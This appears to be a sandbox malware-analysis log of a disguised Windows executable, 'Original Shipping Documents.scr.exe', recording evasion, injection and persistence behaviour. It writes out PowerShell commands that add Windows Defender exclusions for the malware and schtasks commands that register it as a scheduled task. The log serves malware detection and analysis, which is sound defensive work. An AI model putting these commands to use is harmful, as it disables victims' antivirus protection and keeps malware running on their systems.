Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14A80 mov eax, dword ptr fs:[00000030h]	8_2_01B14A80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A78A90 mov edx, dword ptr fs:[00000030h]	8_2_01A78A90
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7AAEE mov eax, dword ptr fs:[00000030h]	8_2_01A7AAEE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7AAEE mov eax, dword ptr fs:[00000030h]	8_2_01A7AAEE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96ACC mov eax, dword ptr fs:[00000030h]	8_2_01A96ACC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96ACC mov eax, dword ptr fs:[00000030h]	8_2_01A96ACC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96ACC mov eax, dword ptr fs:[00000030h]	8_2_01A96ACC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A40AD0 mov eax, dword ptr fs:[00000030h]	8_2_01A40AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74AD0 mov eax, dword ptr fs:[00000030h]	8_2_01A74AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74AD0 mov eax, dword ptr fs:[00000030h]	8_2_01A74AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA24 mov eax, dword ptr fs:[00000030h]	8_2_01A7CA24
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6EA2E mov eax, dword ptr fs:[00000030h]	8_2_01A6EA2E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A64A35 mov eax, dword ptr fs:[00000030h]	8_2_01A64A35
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A64A35 mov eax, dword ptr fs:[00000030h]	8_2_01A64A35
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA38 mov eax, dword ptr fs:[00000030h]	8_2_01A7CA38
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ACCA11 mov eax, dword ptr fs:[00000030h]	8_2_01ACCA11
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	8_2_01A7CA6F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	8_2_01A7CA6F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	8_2_01A7CA6F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEEA60 mov eax, dword ptr fs:[00000030h]	8_2_01AEEA60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABCA72 mov eax, dword ptr fs:[00000030h]	8_2_01ABCA72
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABCA72 mov eax, dword ptr fs:[00000030h]	8_2_01ABCA72
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50A5B mov eax, dword ptr fs:[00000030h]	8_2_01A50A5B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50A5B mov eax, dword ptr fs:[00000030h]	8_2_01A50A5B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A76DA0 mov eax, dword ptr fs:[00000030h]	8_2_01A76DA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CDB1 mov ecx, dword ptr fs:[00000030h]	8_2_01A7CDB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CDB1 mov eax, dword ptr fs:[00000030h]	8_2_01A7CDB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CDB1 mov eax, dword ptr fs:[00000030h]	8_2_01A7CDB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A68DBF mov eax, dword ptr fs:[00000030h]	8_2_01A68DBF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A68DBF mov eax, dword ptr fs:[00000030h]	8_2_01A68DBF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14DAD mov eax, dword ptr fs:[00000030h]	8_2_01B14DAD
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B08DAE mov eax, dword ptr fs:[00000030h]	8_2_01B08DAE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B08DAE mov eax, dword ptr fs:[00000030h]	8_2_01B08DAE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4ADE0 mov eax, dword ptr fs:[00000030h]	8_2_01A4ADE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4ADE0 mov eax, dword ptr fs:[00000030h]	8_2_01A4ADE0

Enables debug privileges

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateFile: Direct from: 0x77752FEC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtOpenFile: Direct from: 0x77752DCC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtSetInformationThread: Direct from: 0x777463F9
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryInformationToken: Direct from: 0x77752CAC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtTerminateThread: Direct from: 0x77752FCC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtSetInformationProcess: Direct from: 0x77752C5C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtNotifyChangeKey: Direct from: 0x77753C2C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtOpenKeyEx: Direct from: 0x77752B9C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtOpenSection: Direct from: 0x77752E0C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtTerminateThread: Direct from: 0x77747B2E
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQuerySystemInformation: Direct from: 0x777548CC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateUserProcess: Direct from: 0x7775371C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtWriteVirtualMemory: Direct from: 0x7775490C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryInformationProcess: Direct from: 0x77752C26
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtResumeThread: Direct from: 0x77752FBC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtReadVirtualMemory: Direct from: 0x77752E8C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateKey: Direct from: 0x77752C6C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtSetInformationThread: Direct from: 0x77752B4C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryAttributesFile: Direct from: 0x77752E6C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateMutant: Direct from: 0x777535CC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtMapViewOfSection: Direct from: 0x77752D1C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtResumeThread: Direct from: 0x777536AC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtReadFile: Direct from: 0x77752ADC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQuerySystemInformation: Direct from: 0x77752DFC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtDelayExecution: Direct from: 0x77752DDC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: NULL target: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe protection: read write
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\SecEdit.exe

Thread register set: target process: 1732

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\SecEdit.exe

Thread APC queued: target process: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
Source: C:\Windows\SysWOW64\SecEdit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Users\user\Desktop\Original Shipping Documents.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
